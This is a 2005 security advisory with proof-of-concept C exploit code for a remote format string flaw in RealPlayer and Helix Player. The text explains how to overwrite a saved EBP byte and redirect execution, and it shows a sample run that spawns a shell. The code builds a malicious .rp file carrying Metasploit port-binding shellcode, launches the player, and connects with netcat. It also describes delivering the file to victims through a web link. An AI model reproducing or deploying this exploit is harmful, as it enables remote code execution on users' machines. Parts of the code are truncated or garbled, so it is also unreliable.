************************************************************************************ \
***************************** $ An open security advisory #13 - RealPlayer and Helix \
Player Remote Format String Exploit
************************************************************************************ \
***************************** 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: September 26th 2005
3: Bug Impact Rate: Hi
4: Bug Scope Rate: Remote
************************************************************************************ \
***************************** $ This advisory and/or proof of concept code must not \
be used for commercial gain.
************************************************************************************ \
UNIX RealPlayer && Helix Player
"The Helix Player is the Helix Community's open source media player for consumers. \
It is being developed to have a rich and usable graphical interface and support a \
variety of open media formats like Ogg Vorbis, Theora etc.
The RealPlayer for Linux is built on top of the Helix Player for Linux and includes \
support for several non-open source components including RealAudio/RealVideo, MP3 \
There is a remotly exploitable format string vulnerability in the latest Helix \
Media Player suit that will allow an attacker the possibility to execute malicious \
code on a victims computer. The exploit code will execute a remote shell under the \
permissions of the user running the media player, and effects all versions of \
RealPlayer and Helix Player.
The bug is exploitable by abusing media, including .rp (relpix)and .rt (realtext) \
file formats. Although others may be effected I stick to realpix file format for \
this advisory.
Almost all media file input is placed on the heap, so it's not possible to just pop \
our way to a supplied string like with a normal stack based format bug, as such we \
can't directly modify GOT, DTORS, etc. leaving us limited to what we can do.
There are several places where we can control the flow of execution:
popN - call *0x04(eax) - eax is controlled
popN+N - call *0x20(eax) - eax is controlled
popN+NN - call *0x100(edx) - edx is controlled
popN+NNN - ebp - ebp is controlled
popN+NNNN - eip - eip is controlled
however since we are limited to the size of the value that can be written, it \
doesn't seem possible to point at a known good location directly. Since our \
shellcode is always mapped via the .rp file between 0x0822**** - 0x082f**** and with \
control of one pointer at a time usually, we can not reach the LSB, we are toast.
In a phrack paper, Riq talks about using sections of the base pointer to create a 4 \
byte pointer by chaining EBP like so:
[Frame 10 EBP]--points to-->[Frame 11 EBP]--points to-->[Frame 12 EBP]
And can be manipulated something like so:
-------- -------- --------
Frame 10 Frame 11 Frame 12
-------- -------- --------
[LSBMSB] [LSBMSB]-- [41414141]
2|____________^ 3|__________^
Well, it doesn't work :-( ..ebp gets moved to esp in frame 11 and it ends with EIP \
pointing at 0x00000000.
So what else can I do?
How about use the fact the file being played is under my control and only the MSB \
needs overwritten. This solves the problem with the size of the valaue I can write. \
It is possible to modify the MSB of an EBP that is reachable, eventually leading to \
EIP pointing at some good location after "mov %ebp,%esp" happens, resulting in the \
execution of our shellcode.
1-> Create a file with shellcode address `printf "\x37\x13\x12\x08"`.rp
2-> Overwrite EBP MSB with the address of the file location on the stack
3-> EBP is moved to ESP
4-> EIP is changed to ESP value
5-> EIP is owned, shell is spawned
Granted this is not a stable method as the user can freely manipulate their \
environment, and we use the file name, which is stored in an environment variable to \
trampoline us to the shellcode. However my goal here is not to create a worm but a \
proof-of-concept :p
The supplied POC should work flawlessly on Debian 3.1, with RealPlayer installed in \
/usr/local/RealPlayer and run as shown below.
Sample local run:
Test System: Debian 3.1 against RealPlayer10.0.5.756 Gold
Window 1:
c0ntex@debauch:~$ netstat -an --ip
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0* LISTEN
tcp 0 0* LISTEN
udp 0 0*
c0ntex@debauch:~$ ./helix4real
Remote format string exploit POC for UNIX RealPlayer && HelixPlayer
Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version
by c0ntex || c0ntexb@gmail.com || http://www.open-security.org
[-] Creating file [VY~Ò.rp]
[-] Using [148] stack pops
[-] Modifying EBP MSB with value [64105]
[-] Completed creation of test file!
[-] Executing RealPlayer now...
[-] Connecting to shell in 10 seconds
(realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to \
(realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to \
ps -ef | tail -12;
c0ntex 1631 1624 0 01:10 pts/2 00:00:00 /bin/sh /usr/bin/realplay \
./VYF&(?.rp c0ntex 1636 1631 4 01:10 pts/2 00:00:02 /bin//sh
c0ntex 1637 1636 0 01:10 pts/2 00:00:00 ? ²ÿ¿f ? ?\ ? ? \
.rp c0ntex 1638 1637 0 01:10 pts/2 00:00:00 ? ²ÿ¿f ? ?\ ? \
? .rp c0ntex 1639 1636 0 01:10 pts/2 00:00:00 \
/usr/local/RealPlayer/realplay.bin ./VYF&(?.rp c0ntex 1640 1636 0 01:10 pts/2 \
00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp c0ntex 1641 1637 0 \
01:10 pts/2 00:00:00 ? ²ÿ¿f ? ?\ ? ? .rp c0ntex 1642 \
1637 0 01:10 pts/2 00:00:00 ? ²ÿ¿f ? ?\ ? ? .rp c0ntex \
1643 1637 0 01:10 pts/2 00:00:00 ? ²ÿ¿f ? ?\ ? \
? .rp
To exploit this remotly, a user just needs to place the created file on a web site \
and provide a link so users can click the file, launching RealPlayer and exploiting \
the vulnerability.
Real have been duely informed about this issue and are fixing. Sadly though, it \
seems someone is trying to pinch my research, as such I have been forced to release \
this advisory sooner than hoped. Until Real get a new release out, do not play \
untrusted media with RealPlayer or HelixPlayer. Sorry Real.com!
Moral of the story, don't talk about personal research on IRC. Thank you \
PS: A new RSS feed for the latest 5 Open Security Group Advisories, @ \
http://www.open-security.org/adv.xml is now available.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFER 10000
#define EBPMSB 64105
#define HOST "localhost"
#define NETCAT "/bin/nc"
#define NOPS 0x90
#define STACKPOP 148
#define VULN "/usr/local/RealPlayer/realplay"
char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70";
/* metasploit port binding shellcode = 4444 */
char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
filegen(char *shellcode)
FILE *rp;
printf("[-] Creating file [%s]\n", filename);
rp = fopen(filename, "w");
if(!rp) {
puts("[!] Could not fopen file!");
printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", \
"<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>\n"
"<fadein start=\"0\" duration=\"0:01\" target=\"2\"/>\n"
"</imfl>", EBPMSB, STACKPOP, shellcode);
free(shellcode); shellcode = NULL;
main(int argc, char **argv)
char *shellcode = NULL;
puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer");
puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version");
puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");
shellcode = (char *)malloc(BUFFER);
if(!shellcode) {
puts("[!] Could not malloc");
memset(shellcode, NOPS, BUFFER);
memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
shellcode[BUFFER] = '\0';
puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now...");
switch(fork()) {
case -1:
puts("[!] Could not fork off, bailing!");
case 0:
if(execl(VULN, "realplay", filename, NULL) <0) {
puts("[!] Could not execute realplayer... :(");
puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON \
REALPLAYER WINDOW **"); sleep(10);
if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) {
puts("[!] Could not connect, check the core file!");